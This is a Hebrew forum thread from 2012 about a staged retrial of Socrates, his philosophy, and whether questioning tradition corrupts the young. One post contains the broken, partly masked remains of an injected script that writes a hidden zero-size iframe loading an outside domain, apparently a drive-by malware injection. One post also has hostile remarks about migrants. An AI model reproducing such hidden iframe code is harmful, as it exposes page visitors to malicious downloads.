| נשלח ב-29/5/2012 08:12 |
|
| |
משפט חוזר לסוקרטס: ואיך זה קשור לעצכח?
מנחם פיש כתב: לפני כ-2,400 שנה הרשיעו 500 מושבעים תושבי אתונה את סוקרטס בכפירה באלים ובהשחתת הנוער של אתונה. המושבעים נתנו בידי הפילוסוף היווני את האפשרות לבחור את עונשו: מוות באמצעות שתיית רעל צמחי או חיים בגלות, הרחק מהפוליס האתונאי המשגשג. סוקרטס, כדרכו הפילוסופית, לא נרתע. הוא עלב במושבעים (ביקש לקבל פרס על מעשיו) וביקר בחריפות את הפרקטיקות הדתיות, הפוליטיות והמוסריות השוררות באתונה. המושבעים לא אהבו את התרסותיו, בלשון המעטה. הם הכריזו על סוקרטס אויב הדמוקרטיה ומחרחר מרי וחתרנות לטובת ספרטה, ושלחו אותו אל כוס התרעלה. ב"משפט החוזר", אותו ארגנה קרן אונאסיס, השתתפו 14 נוכחים: עשרה שופטים מבריטניה, צרפת, גרמניה, יוון, שווייץ וארצות הברית, שני נציגי תביעה ושני סנגורים וזאת למרות שסוקרטס ייצג את עצמו במשפט בשנת 339 לפני הספירה. ל-800 הצופים באולם, כמו גם לאלה שחזו בדיונים באינטרנט, ניתנה גם כן האפשרות להביע את דעתם ולהצביע על גורלו של הפילוסוף. כחלק מהניסיון לפשט את ההליך ולמנוע סיבוכים מיותרים, הוחלט כי השופטים ידרשו להתייחס רק לשאלה אחת: האם סוקרטס אשם או לא על פי החוק האתונאי? עם סיום ההצבעה, התברר עד כמה המחלוקת סביב משפט סוקרטס רלוונטית גם לימינו. חמישה משופטי המשפט החוזר הרשיעו אותו, לעומת חמישה שקבעו כי הוא חף מכל פשע. לפיכך, נקבע כי על פי החוק היווני, במצב של תיקו, סוקרטס אינו אשם. "סוקרטס מתחזה לאיש צנוע אך בא בעת הוא מפגין יהירות. הוא חתרן מסוכן", אמרה לורטה פרסקה, שופטת מחוזית מניו יורק, שהצביעה בעד הרשעתו של סוקרטס. לעומתה אמר עורך הדין הצרפתי, פטריק סימון, ששימש "סנגורו" של הפילוסוף, כי עצם העובדה שסוקרטס מחזיק בדעה מסוימת בשל חיפושו המתמיד אחר האמת - איננה פשע. "מרשי עשה טעות אחת: הוא אהב להתגרות ולהשתמש באירוניה נשכנית. זיכויו מפגין את יציבות הדמוקרטיה", אמר. דבריהם צוטטו על ידי רשת החדשות הרוסית RT. אגב, גם במשפט חוזר אחר שהתקיים בשנה שעברה בניו יורק - זוכה סוקרטס. http://www.haaretz.co.il/news/world/1.1717288 *** שתי הרחבות. מה היה הסיפור של סוקרטס? איך זה קשור לפורום?
 |
|
|
|
|
| נשלח ב-29/5/2012 08:13 |
|
| |
אין לנו ידיעות במישרין על סוקרטס, פרט לכתבים העשירים של תלמידו הגדול אפלטון, אך רק חלק מהם יכולים להחשב לאותנטיים (ועוד כמה איזכורים פה ושם בספרות התקופה). מקור טוב בזמננו, וקצר בהרבה מכתבי אפלטון, הוא ספרו המצויין של גוטליב, "חלום התבונה", הראוי לאשכול בפני עצמו. מה כן ידוע לנו על סוקרטס? אולי זה צריך להתחיל בעירו אתונה, הדמוקרטיה הראשונה בעולם ואולי היחידה שבאמת היה בה שלטון עם, כיון שכל ההחלטות התקבלו בהצבעה משותפת (של אזרחים וגברים בלבד, כמובן). סוקרטס, בעל מקצוע כנראה לא הכי מוצלח וגם אדם מכוער, היה בכל אופן אחד החכמים והאינטליגנטים של אתונה. הוא העסיק את עצמו במה שניתן לכנות "פילוסופיה" במיטבה. כלומר, בהסתמך על ההשערה הבלתי ניתנת להוכחה שיש אמת, שיש ידע, שהשגתם בעלי ערך, שיש חיים ויש חיים "טובים", הוא עסק במרץ בחיפוש אחרי האמת, ודווקא באמצעים מתוחכמים. לדורות השיטה שלו תקבל את השם "דיאלקטיקה". כלומר חיפוש אחרי הגדרות מתוך שאלות ותשובות. כיון שרוב בני אתונה לא היו ברמתו האינטלקטואלית, לסוקרטס לא היה קשה להעמיד את בני השיח שלו ככלי ריק. זה לא גרם לאהבה רבה כלפיו, ואף הביא למותו. לעומת זה, בני נוער, בגיל של התפתחות פילוסופית, נמשכו אחריו. אפשר לסכם את שיטתו של סוקרטס במספר קצר של משפטים. 1. יש טוב ויש ידיעה. הידיעה היא טובה. גם אם הידיעה אינה בת השגה לחלוטין, עדיף להקדיש את החיים לחיפוש אחריה. חיים שאינם כוללים התבוננות וביקורת עצמית ומסירות לערכים אינם ראויים לחיותם. 2. טוב להיות סוקרטס אומלל מאשר פרה מאושרת. 3. בהסתמך על האוראקל של דלפי, טען סוקרטס שנאמר לו שהוא החכם מכל תושבי אתונה. לו עצמו לא היתה תשובה לשאלות הגדולות שלו (והן היו באמת גדולות. אפשר לומר שכל השאלות שייבחנו בפילוסופיה במשך הדורות, עד היום, כבר נזכרו בדבריו, ובוודאי בדברי תלמידו אפלטון). לפיכך, מסקנתו היתה שהוא "יודע שאינו יודע" בעוד אחרים אפילו אינם יודעים שאינם יודעים. בסופו של דבר נערך לו משפט והוא הוצא להורג. ניתנה לו הזדמנות לברוח מאתונה, אבל הוא העדיף להישאר ולשתות את כוס התרעלה. הכל כמובא בכתבי אפלטון. השיחה האחרונה שלו היתה בנושא האלמוות של הנפש והנימוקים שלו עדיין נראים נכונים (וראויים לאשכול נפרד). לא ידעתי כלל שנעשה "משפט חוזר" לסוקרטס, וזה ראוי לפיתוח. וארחיב בתת הפרק הבא.
 |
|
|
|
|
| נשלח ב-29/5/2012 08:13 |
|
| |
על סמך אלו סעיפי חוק ניתן להרשיע אדם שעוסק בפילוסופיה? סוקרטס הואשם שהוא מקלקל את בני הנוער. כלומר, הוא חושף את מנהיגי הדור בקלונם. הם מתיימרים להיות חכמים ובעלי תשובות לשאלות החשובות של החיים. אבל זו הטעיה. אשליה. זה גורם להם לזלזל במנהיגים, בזקנים, בסמכותו של הדור הקודם. וכו'. וכיו"ב. נראה שאם יש חוק האוסר לבזות את הזקנים, אז סוקרטס ודאי עבר עליו. אבל בצורה מתוחכמת. הוא מעולם לא אמר, לפי אפלטון, שום דבר ביקורת ממשי. כל הביקורות שלו היו בסגנון של "שאלתי וקיבלתי תשובה חלקית מדי". "אם מישהו נשאל ולא יודע לענות אז..." וכיו"ב. איך זה דומה למה שקורה בפורום שלנו? נראה לי שיש ויש דמיון. הנחת היסוד של הפורום היא שיש טעם ויש אפשרות לעסוק בדיון פילוסופי בנושאים שלגביהם יש הנחות יסוד מסורתיות. בדיוק כמו סוקרטס, אנו שואלים עליהן. לפעמים הביקורת באה מכיוונים יותר מודרניים. יש לזכור שלסוקרטס לא היה רקע פילוסופי וידע שיש היום לכל ילד. ובמיוחד בעידן האינטרנט. לפיכך, גם אנו, מבחינה מסויימת, "משחיתים את בני הנוער". בין הצעירים בגיל, בין הצעירים בנפש. הנה, הודאת בעל דין! כיון שזה נשמע חמור מאד, אתקן ואבהיר וארחיב. יש מעלה לנעורים. בגיל צעיר, אדם עדיין מאמין שניתן לברר את האמת, ששווה להתאמץ עבור ערכים, שייקוב הדין את ההר, שהכל צריך לתת דין וחשבון לפני הביקורת מצד הערכים, השכל, הדת. יש מוכנות להתאמץ, לבנות שיטות מחשבה או לפחות ללמוד שיטות כאלו, להבין אותן, לארגן אותן, לבדוק אותן. יש פחות מוכנות להסתמך על אחרים, על המסורת. הצעיר אומר: אני רוצה לבדוק לבד. זה דבר טוב מאד, מפני שכך חלים שינויים. וזה דבר רע מאד, כי כך חלים שינויים. כאשר מרשים לאדם לחשוב לבד, מי יודע לאן הוא יגיע? כאשר לא מרשים לו לחשוב לבד, נעלנו את עצמנו. כפי שניתן לראות מן הסיפור על סוקרטס, זו שאלה עתיקת יומין. כמובן, יש הבדל בין המסורת היהודית העשירה מאד, שגם כוללת קריאה למחשבה עצמית ולביקורת עצמית (בדרך ארץ, ביראת שמים ומתוך כבוד לזולת ולחכמים) לבין הביקורת הסוקרטית בהיסטוריה של אתונה. אבל יש גם מן המשותף. למשל, הסיכון. למשל, הזלזול. כמה מילים על זלזול. יש זלזול מכוון. אדם יכול לכתוב על מי שנחשב לגדול שאיננו כזה. סוקרטס מעולם לא ביקר את הומרוס, עד כמה שידוע לי, אבל בהחלט ביקר את דמויות האלילים כפי שהן מוצגות בכתביו של הומרוס ולכן טען שיש להבינם כמשלים (נדמה לי). סוקרטס ודאי זלזל בחלק מן המכובדים של אתונה וחשף אותם בקלונם. ויש זלזול שאינו מכוון. עצם הקריאה לצעיר: בוא, תחשוב לבד, אל תקבל את הנתון בלי לבדוק ובלי ללמוד. הקריאה הזו אומרת בעצם: אל תקבל כלום עד שתחשוב לבד. והרי התביעה של המסורת היא: כזה ראה וקדש. זה זלזול לא מכוון. למעשה, אפשר לומר שאין זה זלזול כלל אלא לימוד. אבל לא פשוט להבדיל בין השנים. (וכבר היו על זה דיונים. כמו הדיון החשוב לדעתי על "אמונת חכמים של חכמים ואמונ"ח של ההמון"). אז האם היה מוצדק לפי החוק להרוג את סוקרטס? האם צריך להרוג את הפורום עצור חושבים, כלומר להעלים אותו מן האינטרנט או לחסום אותו לגולשים שמחפשים גלישה "כשרה"? הערה היסטורית עבור הקוראים שלנו בעתיד, אם יהיו: זמן קצר לפני שנכתבות מילים אלו נודע שספקים שמציעים סינון "חרדי" חוסמים את "עצור חושבים" וכמדומה גם אם אין הם חוסמים את הפורום שמותר להזכיר את שמו, "בחדרי חרדים".
|
|
|
|
| נשלח ב-29/5/2012 08:15 |
|
| |
פורסם בטעות באשכול הלא נכון... קורה, כאשר יש כמה חלונות פתוחים יחד...******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 29/05/2012 08:15:59
שומר פיו ולשונו - שומר מצרות נפשו
< type="text/">document.write("");>
|
|
|
|
| נשלח ב-29/5/2012 10:14 |
|
| |
"Socrates is an evil-doer, and a curious person, who searches into things under the earth and in heaven, and he makes the worse appear the better cause; and he teaches the aforesaid doctrines to others." ההאשמה לפי האפולגיה. [לא מצאתי תרגום עברי ברשת]
|
|
|
|
| נשלח ב-29/5/2012 10:57 |
|
| |
יהי אור תודה על הציטוט. אילו היה לי זמן הייתי מחפש בתירגום ליבס, שהינו סוף סוף מן המקור היווני. האפולוגיה, כמובן שמה בשפת ניכר, היא "התנצלות". זה נאום הסנגוריה של סוקרטס שבאמת מהווה כתב אישום נגד שופטיו. בכל אופן, הקטע הרלוונטי, בתירגום שלי: סוקרטס הינו עושה רע. אדם סקרן, שמחפש בדברים מתחת לארץ ובשמים. והוא מציג את הרע כאילו הוא טוב, והוא מלמד את הדוקטרינות האלו לאחרים... הקטע הזה מזכיר קצת (להבדיל?) את המשנה בחגיגה. ארבעה דברים אין ראוי לחקור בהם, מה למעלה ומה למטה, מה לפנים ומה לאחור. עד כמה שידוע לי איש לא ניסה לקשר בין זה לבין משפטו של סוקרטס (רעיון לדוקטורט?). מסתבר שזה מה שמכנים דמיון פנומנולוגי, כלומר דמיון שנוצר בגלל תופעות מקבילות המתפתחות מעצמן. זאת אם נניח שהנושאים שוים. כמדומה שהקטע המצוטט אינו מספיק מפני שזכור לי שההאשמה המרכזית היתה השחתת הדור הצעיר. שהם אכן מועדים יותר להשפעה (גיל הסקרנות). בכל אופן, מצאנו כאן כתב אישום חדש נגד הפורום שלנו. הוא מעיין יותר מדי ב"מה למעלה ומה למטה" (פילוסופיה) ו"מה לאחור" (היסטוריה מול המקרא). לעומת זה, ה"מה לפנים" - איך ייראה העתיד ואיך עלינו להתייחס לזה - שמור כמדומה לפורום האחות, "אגודה אחת" (או לבח"ח, אם כי באופן אחר לגמרי).
 |
|
|
|
|
| נשלח ב-29/5/2012 17:58 |
|
| |
החטא היחיד שלו היית שגרם לאנשים לא לעשות מצוות אנשים מלומדה,
ולכן אנו יהודי אשכנז שרפנו את ספרי הרמב"ם כי גם הוא בעצם הטיף לכך,
לו היית סנהדרין מסוג האנשים האלה בוודאי היו מחייבים מיתה לרמב"ם מאותו סיבה,
אמר היעב"ץ שחבל שלא תגנוב היא לא מנהג, כי אז אולי היינו מקיימים זאת,
אנו לדעבונינו כל חיינו והשקפתינו הם מצוות אנשים מלומדה,וכל מי שמעורר את הבעיה חייב מיתה הוא וכל משפחתו חיב כרת, ודווקא כאן לא סומכים על האלוקים ומייסמים זאת הלכה למעשה, (כלומר שרוצים כסף אז האלוקים ישלם לך בחזרה, שרוצים לעניש אז עושים זאת בידים ולא סומכים שהאלוקים יעשה זאת)
תוקן על ידי maxmen ב- 29/05/2012 18:00:11
|
|
|
|
| נשלח ב-30/5/2012 06:21 |
|
| |
משפט סוקרטס במשפטו המפורסם, הצטדק סוקרטס נגד האישום על שהוא מלמד את הנוער מחכמתו שאינו נכונה, חוקר מה בשמים ומה לתחת לארץ, ועושה את הרע להיראות טוב. כי הוא אינו חכם כלל, ואם יש לו חכמה מסוימת, כאשר העיד עליו האל אפולו, אין זה אלא בזה שהוא יודע שהוא אינו יודע, ואת זה הוא מנסה להראות לאנשי אתונה, שיבחנו את דעותיהם וידעו שהם אינם יודעים. בדרך זו קנה לעצמו שונאים רבים, והם אשר התחילו בהאשמות נגדו. סוקרטס אולי תפס את הדברים האלו כהגנה, וכדברי צניעות והצטדקות, אך נראה כי דווקא הדברים האלו הם המסוכנים ביותר, וכי על הדעה/דרך הזו בוודאי שירגזו אנשי אתונה ויאשימוהו. ומכאן אני רוצה ללמוד לגבי השאלה שלנו כיום, ולעמוד על הפרדוקס המפליא אשר בחברות ממסדיות, בהם מי שמלמד את חוסר הידיעה והוודאות נתפס כמחוצף וכבעל גאווה יתר על מי שמראה עצמו כיודע כל בוודאות. סמכות אלטרנטיבית המוצגת כיודעת-כל, אינה מסוכנת לממסד כמו מי שמנסה ללמד לתלמידים להשתמש במחשבתם עצמם. ויותר מהם, מי שמלמד אותם שבעצם אף אחד לא יודע באמת כלום, ואת הדרכים הפשוטות להראות זאת. הנצמדים למסורה, לכאורה עושים זאת מתוך ענווה והתבטלות אל הקודמים, אך לאמיתו אין כאן אלא נסיון לברוח מהקטנות שלהם עצמם, ולהתכסות תחת סמכות וגדלות מי שהם תופסים כגדול וחזק מהם, ומי לי גאווה עצמית פרטית מה לי גאווה כללית על מי שאני משתייך אליו, האם אין שניהם אותו גאווה ויומרנות כאילו יודעים את הכל? יתר על כן, יש כאן כשל לוגי, אם אני איני בר הכי להחליט על האמת בדעתי, איך אהיה בר הכי לקבוע מי הוא המדבר בשם האמת. האם ההחלטה על מסורת מסוימת כמייצגת את כל האמת קלה יותר מאשר ההחלטה על האמת בעצמה? ומדוע לגבי השאלה הזאת, החשובה אף יותר משאלת האמת לכשעצמה,, אוכל לסמוך על דעתי הקלה בהחלטיות? אלו הן שאלות סוקרטיות פשוטות, שכל אחד חייב לשאול את עצמו ואת מי שמנסים להציג את האמת הוודאית ההחלטית. ולמכור את עצמם כיודעים.
תוקן על ידי יהיאור ב- 30/05/2012 06:28:17
 |
|
|
|
|
| נשלח ב-30/5/2012 08:25 |
|
| |
| יהיאור כתב: |  |
הנצמדים למסורה, לכאורה עושים זאת מתוך ענווה והתבטלות אל הקודמים, אך לאמיתו אין כאן אלא נסיון לברוח מהקטנות שלהם עצמם, ולהתכסות תחת סמכות וגדלות מי שהם תופסים כגדול וחזק מהם, ומי לי גאווה עצמית פרטית מה לי גאווה כללית על מי שאני משתייך אליו, האם אין שניהם אותו גאווה ויומרנות כאילו יודעים את הכל? יתר על כן, יש כאן כשל לוגי, אם אני איני בר הכי להחליט על האמת בדעתי, איך אהיה בר הכי לקבוע מי הוא המדבר בשם האמת. האם ההחלטה על מסורת מסוימת כמייצגת את כל האמת קלה יותר מאשר ההחלטה על האמת בעצמה? ומדוע לגבי השאלה הזאת, החשובה אף יותר משאלת האמת לכשעצמה,, אוכל לסמוך על דעתי הקלה בהחלטיות? אלו הן שאלות סוקרטיות פשוטות, שכל אחד חייב לשאול את עצמו ואת מי שמנסים להציג את האמת הוודאית ההחלטית. ולמכור את עצמם כיודעים.
תוקן על ידי יהיאור ב- 30/05/2012 06:28:17
|
|
אני חושב שיש לך כאן טעות גדולה התורה אינה מניחה את הידיעה כעיקר וכדבר בעל ערך בפני עצמו ולכן אין שום צורך להסתמך על דעה כל שהיא בשביל לעשות את הישר והטוב שבה מודים העולם כולו ללא כל חולק הדבר העיקרי שבשבילו נתן ה' את התורה הוא דווקא בשביל להוציא מהדעות המשובשות של אנשים שהמציאו להם לעצמם תיאוריות שונות על פי שרירות לבם אלא שכיון שכל אדם מטבעו יש לו הכרח לראות את העולם דרך תיאוריה וצורה מסוימת של הסתכלות כיון שכך היא צורת הנפש האנושית לכן יש צורך ביישור הדעת לא היצירה שלו אלא בשביל שהוא יעמוד על פי המידה הנכונה שהוא אמור להיות בו וכיון שאין שום אפשרות בעולם לדבוק ביושר הפנימי אם הבסיס הראשון לא בא מתוך ענווה לכן אין שום אפשרות אחרת אם לא בלדבוק בחכמים וכמו שידוע חוסר האמונה בחכמה כעיקרון היא שפלות ולא ענווה בתורה שאני מכיר אין שום תיאוריה חוץ מדברי חכמים שנאמרו מתוך עומק ההבנה שלהם את האדם והעולם מתוך החיפוש של מה ה' דורש מאיתם
סוקטס נשמע אולי כאברהם אבינו בניפוץ האלילים שלו אלא שכיון שלא נראה שהיה לו עומק של אחריות על העולם בצורה של למען אשר יצווה את בניו וכו' לכן אי אפשר לייחס לו רק כוונות טהורות וברור שהרבה מהדברים שלו נאמרו כהתרסה לשם התרסה ולא לשם מציאת פתרון יותר טוב ואמנם שגם בכך יש צורך לעולם ובוודאי שהוא לא בא לעולם במקרה אלא שברור גם שלא הוא הדמות שאליו יש לשאת את העיניים
|
|
|
|
| נשלח ב-30/5/2012 09:23 |
|
| |
יעקב לא זכיתי להבין מה זה התורה ללא תיאוריה שאתה מדבר עליה. האם כוונתך רק לשיפור חינוכי ותכליתי מסוים, בערך מן הסוג שמקס מטיף לה. נכון שבתורה אין הרבה עיסוק בתיאוריה, אבל זה היה הסגנון אז, ובהכרח שברקע הדברים יש הבנה כלשהו של המציאות גם אם לא נסנסחה במילים.
נכון שיש לחלק בין ענווה לבין יאוש ושפלות, אבך צריך גם להכיר את המציאות. העובדה שאנחנו יודעים כמעט כלום לא קשור לענווה וגאוווה בכלל אלא פשוט לראייה נכונה של המציאות. וזה טען סוקרט. לגבי האם היה לו אמצעי יותר טוב, דווקא נראה שכן, לפחות במידה מסוימת, [והרי חלקים גדולים במסורת שלנו אימצו את דעתו פחות או יותר] החסרון העקרי שבו הוא שמראש הוא פונה רק ליחידים. וגם, הנראה לך שאנשי אתונה היה להם דרכים יותר טובים לחינוך? זהו עיקר תורף הגנתו נגד ההאשמה הזאת, שהוא מראה להם שהם אינם יודעים כלום על מהו להיטיב את הנוער ומה זה טוב בכלל וכו'.
חלק העיקרי שאני קורא בסוקרט הוא הקריאה להמשיך לחפש אחר הטוב והראוי ולא להשלות את עצמנו שכבר הגענו, ונראה שזה לקח מוכרח לכל מהלך שלא יהיה. אין בדבריו יאוש אלא קריאה ושאיפה להבנה יותר נכונה וטובה. והצעה לעשות זאת ביחד, דרך הדיאלקטיה.
ואכתי צ"ע.
לגבי לשאת את העינים לסוקרט או לאברהם אבינו. לדעתי יותר משאנו מדמים את סוקרט לאברהם אנו מדמים את אברהם לסוקרט. כל הדמות של אברהם כמבקש טוב ואמת ומנפץ אלילים וכו' שמתחילה בחז,ל וביתר בספרי ההגות היהודית לדורותיה, יש לה בסיס מאד מועט במקורות הראשוניים, ועיקרו מבוסס על הדמות של הפילוסוף האידיאלי שלקחנו מסוקרט. [גם המסירות נפש לעקרונותיו כפי שהדגים סוקרט בפועל, אם כי גם בזה יש לראות הבדל גדול בין דרכו לדרך אברהם, לא נראה שאברהם היה מונע א"ע מלברוח, ואכ"מ] כך שאני אכן נושא את עיני לדמותו של סוקרט. [ולא משנה ההיסטוריהף אני מתכוון לאידיאל].
תוקן על ידי יהיאור ב- 30/05/2012 09:27:18
תוקן על ידי יהיאור ב- 30/05/2012 09:35:41
 |
|
|
|
|
| נשלח ב-30/5/2012 11:34 |
|
| |
האם היהדות אכן מעודדת חשיבה? אולי הרמב"ם כן, אולם להערכתי הוא היה בטוח במסקנה והיה בטוח שכולם (לפחות החכמים שאינם נמשכים אחר תאוותיהם) אמורים להגיע אליה. האם חז"ל עודדו חשיבה. נראה שהחשיבה היא רק בגלל איבוד המסורת, אי שימוש הרב כל צרכו, וחוסר היכולת (הטכני) להגיע להחלטה מוסכמת. אילו המסורת היתה נשמרת והמוסדות הרשמיים היו ממשיכים לתפקד, אנחנו לפחות היינו פטורים/אסורים בחשיבה.
|
|
|
|
|
| נשלח ב-30/5/2012 19:52 |
|
| |
כשאתה מדבר על חשיבה רק מחמת איבוד המסורת אתה מדבר רק על החלק ההלכתי או גם על המחשבתי?
|
|
|
|
| נשלח ב-30/5/2012 21:33 |
|
| |
בעיקר על המחשבתי, האם היתה מסורת על מחשבה? ראה את הפתיחה למורה נבוכים.
|
|
|
|
| נשלח ב-30/5/2012 23:28 |
|
| |
| 1yakovw כתב: |  | | סוקטס נשמע אולי כאברהם אבינו בניפוץ האלילים שלו אלא שכיון שלא נראה שהיה לו עומק של אחריות על העולם בצורה של למען אשר יצווה את בניו וכו' |
|
למען יצווה את בניו לעומק = גם את תלמידיו, ואם כל התבונה האנושית הוא הביא ודירבן ?! ובגללו ביטלו את האלילות באנושות ?! (שזה הכוונה העמוק שאנשי כנסת הגדולה ביטלו את ע"ז) אז אין לך יצווה את בניו יותר גודל מזה !!
בעלדיו לא היתה אפלטון ואריסטו וכל התבונה האנושית שיש היום,
לא מקובל אלי שכל חכם אחר לא מכוון לטוב רק להפקרות, ורק החכם שלי מכוון לטוב למען יצווה וכו'
בתכלס הוא ביטל את העבודת האלילים באנושות, (כדאי לגר אותו או למצאו אולי היה יהודי )
תוקן על ידי maxmen ב- 30/05/2012 23:30:25
|
|
|
|
| נשלח ב-31/5/2012 01:08 |
|
| |
יהיאור עיקר העניין שהתכוונתי לכתוב הוא את הנקודה הזאת שאמנם הספקנות הוא כלי חשוב ואין חכמה ללא שהאדם ישאל את מה שיש להסתפק עליו אלא שהנטייה להשאיר את הדברים פתוחים יש בה נטיה להרס עצמי על ידי הערעור על הטהרה של המושכלות הראשוניים ולכן בהכרח שהחכמה תהיה רק אמצעי ולא מטרה והלימוד יהיה מתוך כוונה מראש דווקא על מנת לעשות אם אתה רוצה לדבר על התאוריה של התורה אז מדובר על עתיד של גאולה אישית ועולמית והוא הטהרה והקדושה וישראל הם ממלכת כוהנים וגוי קדוש ובזה החטא הגדול ביותר הוא ההליכה בקרי שבה ההתייחסות לחכמה ובאופן כללי לכל מקרי העולם כדברים חסרי משמעות קיומית והוא החטא החמור ביותר כיון שבכך האדם עצמו נותר שפל והברכה של החכמה הופכת לקלות דעת ולקללה
לדוגמא באשכול סמוך מתוך רצון להיראות כיפה נפש יהיו כאלו שילחמו על כך שהארץ תוצף בסודאנים מכוח ציווי התורה של ואהבת את הגר רק שהם לא שמו לב כנראה שהתורה גם אומרת על שבעת העמים לא תחיה כל נשמה פן יחטיאו אותך לי האהבה של הגר היא ליחיד ולכל אדם שנברא בצלם ואין לזה שום קשר להכנסה של ציבור שלם בשביל לבולל את הארץ - אדם שהוא ללא זהות הוא לא אדם ולכן היחס לזהות הלאומית שלנו כדבר חסר ערך הוא דבר שמראה על זלזול בכל המציאות האנושית של האדם ולא על סתם אהבה פשוטה
עיקר העניין הוא שהתורה היא לא תיאוריה אלא שיש בה ציווי להבחין ולהבין את המציאות שאותה אנחנו חיים והמציאות הזאת למי שרק מתבונן אפילו מעט היא מכילה מציאות שהיא מעבר למציאות האדם עצמו ואת הדבר הזה היא מחייבת אלא שבשביל שהדבר הזה יתקיים יש צורך חיוני במציאות של החכמה
בעניין של אברהם - מה שהתורה אומרת עליו הוא שדבר ראשון הוא הכיר באמת המוחלטת ששופט כל הארץ לא יתכן שלא יעשה משפט צדק דבר שני הוא ההרגשה העמוקה שלו של מה תיתן לי ואנוכי הולך ערירי שלא יתכן שהאדם הוא כאן בעולם רק בשביל עצמו והדבר העיקרי שבו כל השאר בא רק כהקדמה אליו הוא העקדה שבו אברהם הגיע למקום של ביטול האלילות ודווקא מתוך עבודת ה' ואת הדבר הזה הוא הנחיל ובה הוא הרגל הראשונה במרכבה של השכינה ולעומתו סוקרטס נראה דל וריק ואמנם שהוא סייע ליצירת כלים חשובים אלא שהוא לא גרע בזה גויי הארץ שיום ולילה לא ישבתו בעיסוק שלהם ביצירת האמצעים לאדם השלם
 |
|
|
|
|
|